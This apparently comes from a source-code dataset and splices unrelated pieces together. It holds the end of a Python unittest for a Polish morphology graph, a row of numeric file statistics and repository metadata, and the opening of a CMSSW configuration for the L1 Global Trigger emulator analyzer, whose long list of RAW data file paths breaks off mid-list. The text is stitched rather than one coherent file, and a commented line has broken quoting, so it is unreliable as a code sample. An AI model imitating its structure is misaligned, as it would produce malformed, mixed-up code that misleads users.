self.assertEqual(('zaimek', 'ja', {'przypadek': 'mianownik', 'liczba': 'pojedyncza', 'osoba': 'trzecia', 'rodzaj': 'm'}), self.graph.get_conf('on')[0])
self.assertEqual(('zaimek', 'ja', {'przypadek': 'mianownik', 'liczba': 'pojedyncza', 'osoba': 'trzecia', 'rodzaj': 'ż'}), self.graph.get_conf('ona')[0])
self.assertIn(('zaimek', 'który', {'przypadek': 'miejscownik', 'liczba': 'pojedyncza', 'rodzaj': 'ż'}), self.graph.get_conf('której'))
self.assertIn(('zaimek', 'który', {'przypadek': 'miejscownik', 'liczba': 'pojedyncza', 'rodzaj': 'mos'}), self.graph.get_conf('którym'))
self.assertIn(('zaimek', 'który', {'przypadek': 'miejscownik', 'liczba': 'mnoga', 'rodzaj': 'mos'}), self.graph.get_conf('których'))
def testGetConfVerb(self):
self.assertIn(('czasownik', 'następować', {'forma': 'czas teraźniejszy', 'liczba': 'pojedyncza', 'osoba': 'pierwsza'}), self.graph.get_conf('następuje'))
self.assertIn(('czasownik', 'następować', {'forma': 'czas teraźniejszy', 'liczba': 'mnoga', 'osoba': 'trzecia'}), self.graph.get_conf('następują'))
self.assertIn(('czasownik', 'występować', {'forma': 'czas teraźniejszy', 'liczba': 'pojedyncza', 'osoba': 'pierwsza'}), self.graph.get_conf('występuje'))
self.assertIn(('czasownik', 'występować', {'forma': 'czas teraźniejszy', 'liczba': 'mnoga', 'osoba': 'trzecia'}), self.graph.get_conf('występują'))
self.assertIn(('czasownik', 'być', {'forma': 'czas teraźniejszy', 'liczba': 'pojedyncza', 'osoba': 'trzecia'}), self.graph.get_conf('jest'))
self.assertIn(('czasownik', 'być', {'forma': 'czas teraźniejszy', 'liczba': 'mnoga', 'osoba': 'trzecia'}), self.graph.get_conf('są'))
def testGetConfPreposition(self):
self.assertIn(('przyimek', 'z', {'forma': 'z'}), self.graph.get_conf('z'))
self.assertIn(('przyimek', 'z', {'forma': 'ze'}), self.graph.get_conf('ze'))
def testGetConfAdjective(self):
self.assertIn(('przymiotnik', 'opis', {'liczba': 'mnoga', 'rodzaj': 'm'}), self.graph.get_conf('opisane'))
self.assertIn(('przymiotnik', 'opis', {'liczba': 'mnoga', 'rodzaj': 'ż'}), self.graph.get_conf('opisane'))
def testGetConfNoun(self):
self.assertIn(('rzeczownik', 'znak', {'przypadek': 'dopełniacz', 'liczba': 'pojedyncza'}), self.graph.get_conf('znaku'))
self.assertIn(('rzeczownik', 'znak', {'przypadek': 'mianownik', 'liczba': 'pojedyncza'}), self.graph.get_conf('znak'))
self.assertIn(('rzeczownik', 'znak', {'przypadek': 'mianownik', 'liczba': 'mnoga'}), self.graph.get_conf('znaki'))
if __name__ == '__main__':
#import sys;sys.argv = ['', ''Test.test']
unittest.main()
| 87.869159 | 282 | 0.625612 | 1,004 | 9,402 | 5.785857 | 0.118526 | 0.053021 | 0.088828 | 0.094681 | 0.858151 | 0.846617 | 0.836977 | 0.787571 | 0.772594 | 0.674643 | 0 | 0.001222 | 0.129866 | 9,402 | 106 | 283 | 88.698113 | 0.708838 | 0.006488 | 0 | 0 | 0 | 0 | 0.374598 | 0 | 0 | 0 | 0 | 0 | 0.551282 | 1 | 0.141026 | false | 0 | 0.064103 | 0 | 0.217949 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3133a9cb55093a07539170a5586f678e56c045e1 | 73,723 | py | Python | L1Trigger/GlobalTriggerAnalyzer/test/L1GtDataFromRawEmulAnalyzer_cfg.py | PKUfudawei/cmssw | 8fbb5ce74398269c8a32956d7c7943766770c093 | [
"Apache-2.0"
] | null | null | null | L1Trigger/GlobalTriggerAnalyzer/test/L1GtDataFromRawEmulAnalyzer_cfg.py | PKUfudawei/cmssw | 8fbb5ce74398269c8a32956d7c7943766770c093 | [
"Apache-2.0"
] | null | null | null | L1Trigger/GlobalTriggerAnalyzer/test/L1GtDataFromRawEmulAnalyzer_cfg.py | PKUfudawei/cmssw | 8fbb5ce74398269c8a32956d7c7943766770c093 | [
"Apache-2.0"
] | null | null | null | #
# cfg file for:
#
# Unpack the GCT, GMT and GT data.
# Run the L1 GT emulator on the unpacked GCT and GMT data.
# Compare the GT data records with the GT emulated records
#
import FWCore.ParameterSet.Config as cms
process = cms.Process("RunL1GtDataFromRawEmulAnalyzer")
# number of events and source
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(5000)
)
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring('file:/afs/cern.ch/user/g/ghete/scratch0/CmsswTestFiles/testGt_DataFromRawEmulAnalyzer_source.root')
)
process.PoolSource.fileNames = ['/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/003AD0A3-B51C-DD11-834F-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/020DA07C-9C1C-DD11-8B5C-0019DB29C614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/026FFDE2-B71C-DD11-9D4A-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/028925DF-A61C-DD11-BDF1-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0401CDA0-A01C-DD11-9BDB-001617E30D06.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0414D38E-9E1C-DD11-A7E5-001617E30D0A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/04F62EBD-B91C-DD11-BB9C-001617E30D06.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0696D1C9-A41C-DD11-A411-000423D6A6F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0A052134-AF1C-DD11-8919-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0A60D7DC-A41C-DD11-9075-001617E30CA4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0A637587-B31C-DD11-B32A-000423D996C8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0A71AABE-A21C-DD11-A9A1-000423D9870C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0C3D3FB1-B11C-DD11-9B38-000423D992DC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0C4A72B9-B91C-DD11-8A6F-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0C60F77C-9C1C-DD11-BC75-001617C3B73A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0C87A74D-9A1C-DD11-A29B-000423D99020.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0E34B872-9C1C-DD11-8208-000423D98804.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0E8A89B0-B91C-DD11-8EBA-000423D9939C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0EF363E9-A61C-DD11-B75F-001617E30CE8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/105F2C89-9E1C-DD11-9D86-001617DBD49A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1211D927-B81C-DD11-91B3-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/121EDD5E-B11C-DD11-AEDE-001D09F23E53.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/12464707-A91C-DD11-B478-000423DD2F34.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/127649CF-A41C-DD11-B170-000423D6B5C4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/146566AE-B71C-DD11-A113-001617DC1F70.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1483D99C-B51C-DD11-9274-000423D6CAF2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/148AB865-B11C-DD11-8B3F-001D09F24E39.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/14B76514-AB1C-DD11-BEFA-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/14E55CBD-B91C-DD11-A876-001617C3B64C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/14F7A391-A01C-DD11-9D9E-001617DC1F70.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1607D3A0-A01C-DD11-9223-001617E30CA4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/16673A21-B81C-DD11-8D6F-001617E30CC8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/18096B2D-AF1C-DD11-A2A2-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/189AC9C5-A41C-DD11-868A-000423D9880C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1A9B278C-A01C-DD11-842F-000423D6CAF2.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1AD12186-9E1C-DD11-815A-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1C240A80-9E1C-DD11-99DD-000423D985E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1C7DCBDA-A61C-DD11-BFCA-000423D99020.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1E24F97C-9C1C-DD11-8921-000423D6CA02.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1E9EE338-9A1C-DD11-987A-000423D6A6F4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2021DDD2-A41C-DD11-AAF1-001617E30D0A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2064C823-AD1C-DD11-B86F-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/20675D3E-AF1C-DD11-B97D-001617E30D0A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2072E22E-981C-DD11-B7A0-000423D986A8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/209E2E2B-AB1C-DD11-8B0F-000423DC1A0C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/20DFF4BD-A21C-DD11-AAE4-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2201A985-9E1C-DD11-B808-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/22718B76-9C1C-DD11-95E1-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/228D717C-9E1C-DD11-B614-000423D6A6F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/22B6FAD7-A41C-DD11-9238-001617DF785A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/242FCD06-AB1C-DD11-8213-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2445DE33-981C-DD11-A43B-000423D992A4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/26B69B96-A01C-DD11-8FC4-001617C3B73A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2812BEEF-B71C-DD11-8F46-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2A2CCCA0-A01C-DD11-93B9-001617DBD556.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2A59E006-A91C-DD11-A82B-000423D99020.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2AB8E6D7-A41C-DD11-9CE5-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2C6D88A5-B51C-DD11-82E3-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2CA386B3-B91C-DD11-BDE5-001617C3B76E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2E3E1A3E-9A1C-DD11-A7CE-001617C3B614.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2E9DA8C2-B91C-DD11-8DE2-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/32D12786-9E1C-DD11-847B-001617C3B70E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/32FB38BC-B91C-DD11-A8E5-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/32FD88CF-A41C-DD11-BB80-000423D6BA18.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3465F6A3-B71C-DD11-814D-001617C3B5D6.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/36588B7A-B11C-DD11-8EF1-001D09F24024.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/368E861F-B81C-DD11-B1B3-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/36B9546B-B41C-DD11-9F3D-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/36D22616-AB1C-DD11-BFCF-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/382BA240-AF1C-DD11-AF9F-000423D94C80.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3AA50549-9A1C-DD11-AABD-001617C3B70E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3AD70FB4-A21C-DD11-8A63-000423D6B2D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3ADAADE1-A61C-DD11-B2AA-001617E30E2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3C096D93-A01C-DD11-B602-000423D6CA6E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3C87B1E8-A61C-DD11-A4F2-000423D996C8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3CCC829C-A01C-DD11-ACDF-000423D9880C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3E22AFBB-A21C-DD11-AB9B-000423D6BA18.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3E7BB98C-A01C-DD11-91C0-000423D6B5C4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/400B2EDA-A61C-DD11-B40A-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/403705CF-A41C-DD11-A0CC-000423D992A4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/40A83AB4-B91C-DD11-9009-001617DBD5AC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/426D436B-9C1C-DD11-9397-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/42E7BF93-A01C-DD11-B183-000423D6B48C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/42FFA897-A01C-DD11-BD31-000423D6A6F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/442D1EDA-A41C-DD11-99E7-000423D6CAF2.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/44BA378D-A01C-DD11-A315-000423D6B444.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/44BB2D77-9C1C-DD11-BB5A-001617C3B6CC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/462E23DA-A61C-DD11-8BB4-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/48626E2D-AF1C-DD11-AC76-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/48746689-9E1C-DD11-8636-0019DB29C5FC.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/487B3F93-A01C-DD11-9494-000423D986A8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/4888D793-A01C-DD11-8015-000423D9870C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/48C529D3-A41C-DD11-A339-001617E30F4C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/48CED0AD-B51C-DD11-90F8-001617DBD556.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/4A251384-9E1C-DD11-ABCC-001617C3B5D6.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/4CB2CE88-B31C-DD11-AFB6-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/4CC3CE79-B11C-DD11-9EDA-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/4EFE256E-9C1C-DD11-BB71-000423D992A4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/50F6304D-9A1C-DD11-B404-000423D985B0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/50F86B89-9E1C-DD11-A8AF-001617E30D06.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/52756844-9A1C-DD11-8D8D-001617DBCF90.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/52E7ECA0-B51C-DD11-BB37-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/52F22F7D-B31C-DD11-A927-000423D99660.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/54387CBD-A21C-DD11-948C-000423D6B48C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/5689BB7C-9C1C-DD11-814E-001617C3B706.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/569DD041-9A1C-DD11-998E-000423D6C8EE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/56A0A3E6-A61C-DD11-9903-0019DB29C614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/584C9F03-A91C-DD11-B7CF-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/589FD448-9A1C-DD11-987B-001617C3B6DC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/58D1F7BD-A21C-DD11-868A-001617E30D12.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/58FE98E6-A61C-DD11-8D9F-001617DF785A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/5AC19AC4-A21C-DD11-9156-001617E30D40.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/5CC7329E-B51C-DD11-9263-001617DC1F70.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/5E91438D-9E1C-DD11-84C5-000423D6CA02.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/5EF53351-B81C-DD11-A03E-000423D99020.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/609D941F-AD1C-DD11-9C31-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/60D31125-B81C-DD11-BA96-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/60F55A71-9C1C-DD11-B2A5-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/62815270-B31C-DD11-8D5F-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6286A3CE-A41C-DD11-B778-000423D6CA6E.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/628AC3E4-A61C-DD11-B825-000423D99658.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/628C32BE-A21C-DD11-BF26-001617C3B73A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/64870171-9C1C-DD11-9446-001617E30E2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/64C37396-A01C-DD11-AC51-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/66382D71-B31C-DD11-A1EC-001617E30F46.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/66A011A1-A01C-DD11-BB03-001617E30E28.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/66BF7047-9A1C-DD11-9E11-001617C3B6CC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/66C6BFDF-A61C-DD11-B38A-000423D94C68.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/68CADF33-AF1C-DD11-B816-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/68F15475-B31C-DD11-9003-000423D99020.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6A447F52-B11C-DD11-ADF5-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6A81039D-A01C-DD11-AB8C-000423D6BA18.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6ADDF69C-B51C-DD11-AACF-000423D9863C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6C22E3A6-A01C-DD11-BF27-001617C3B64C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6C2A4D97-B11C-DD11-8199-001617E30D54.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6CA70D49-9A1C-DD11-A02B-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6E3BEBE1-A61C-DD11-864F-001617DBCF1E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6EDB6407-A91C-DD11-B38D-0016177CA7A0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/701CC33D-9A1C-DD11-86A0-001617E30E2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/70D54482-B11C-DD11-8967-001D09F26C5C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/70FFC09B-B51C-DD11-B3E3-001617C3B654.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/724E9A61-B11C-DD11-BD5E-000423D94C80.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/72500CBD-B91C-DD11-9808-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/740C169F-B51C-DD11-B13D-000423DD2F34.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/740ECA5B-B11C-DD11-B2E9-001617C3B614.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/74A18258-AF1C-DD11-95C3-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/74A67AE1-A61C-DD11-BA54-000423D8FA38.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/74F4C19C-B51C-DD11-8E0C-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/7603B179-9C1C-DD11-B7D4-0019DB29C5FC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/76867668-9C1C-DD11-B5ED-000423D6AF24.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/76B197DF-A61C-DD11-B053-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/7851BF3D-981C-DD11-98DE-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/7871E4B3-B91C-DD11-9810-001617C3B6E8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/78A51442-9A1C-DD11-82CE-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/78B68EE6-A61C-DD11-982C-000423D94A20.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/7AB72EDA-A61C-DD11-93AE-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/7C0BF6D7-B31C-DD11-A632-000423D9517C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/7E311039-981C-DD11-8455-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/80313A1F-B81C-DD11-BCAE-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/80345FC4-A41C-DD11-AA4B-000423D985E4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8070C7DF-B71C-DD11-ADA3-000423D985E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/822E46C5-A21C-DD11-92FE-001617E30CA4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/84267891-A01C-DD11-AC5E-001617E30D12.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8482A33A-981C-DD11-BA59-000423D6A6F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/848D9EC2-B91C-DD11-BD85-001617C3B614.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/84F6D348-9A1C-DD11-AC69-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/84FD6FDF-A61C-DD11-9A4C-0019DB29C5FC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/865955BE-A21C-DD11-8B6B-001617E30D38.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/86B628BD-B91C-DD11-B16E-001617DBD224.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/86B85B3E-9A1C-DD11-8459-000423D992A4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/86E278C3-B91C-DD11-9EBB-0016177CA7A0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8A5F9D3D-9A1C-DD11-B194-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8A8B30DD-A41C-DD11-A07F-001617DBD288.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8AADB270-B31C-DD11-938C-000423D94C80.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8C25D448-9A1C-DD11-BAA5-001617E30F46.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8C52216F-B31C-DD11-82EA-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8CAD26DA-A61C-DD11-AE7E-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8E592FC0-B91C-DD11-A920-001617E30D00.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8E70E876-9C1C-DD11-84BE-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8E896B1E-B81C-DD11-B712-001617C3B6E8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8EA513BB-A21C-DD11-97DE-000423D6B444.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8EA8A0ED-A81C-DD11-A65A-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8EB8255F-B11C-DD11-B3D7-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8EF6EF7C-B31C-DD11-B02E-000423D98EC8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/904AB138-9A1C-DD11-B0C7-000423D9880C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/904C3593-A01C-DD11-BCCC-000423D9939C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9066B967-9C1C-DD11-BB3B-000423D6A6F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9067ACE6-A61C-DD11-B578-001617C3B77C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/90823880-B11C-DD11-A6BF-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/909250C9-A41C-DD11-8F66-000423D6B444.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/909962C1-A21C-DD11-A255-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9262E0B9-A21C-DD11-BDED-000423D9880C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9272C5EB-A81C-DD11-88D5-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9449765E-B11C-DD11-B99D-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/94AE4A9E-B51C-DD11-A5FE-001617C3B76A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/94C8DE6D-9C1C-DD11-98FE-000423D986A8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/965BD87C-B31C-DD11-BCB0-001617C3B6CC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/96613A1F-B81C-DD11-B8A8-000423D985B0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/98315DBA-B91C-DD11-A70D-001617E30F4C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9837D448-9A1C-DD11-99DC-001617DBD49A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/98577A34-981C-DD11-B699-000423D985E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/987C6A38-981C-DD11-A3EB-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/98F26DFE-A81C-DD11-B151-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9A9188C9-A41C-DD11-ADA5-000423D6B48C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9C33A87C-9C1C-DD11-9622-001617C3B64C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9C52E338-9A1C-DD11-BF41-000423D6AF24.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9CBEB742-AF1C-DD11-91F0-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9CC04B90-9E1C-DD11-B8DC-000423DD2F34.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9E8233A0-B51C-DD11-9222-001617DBD316.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A02EB8EA-A61C-DD11-A112-000423D99AA2.root',
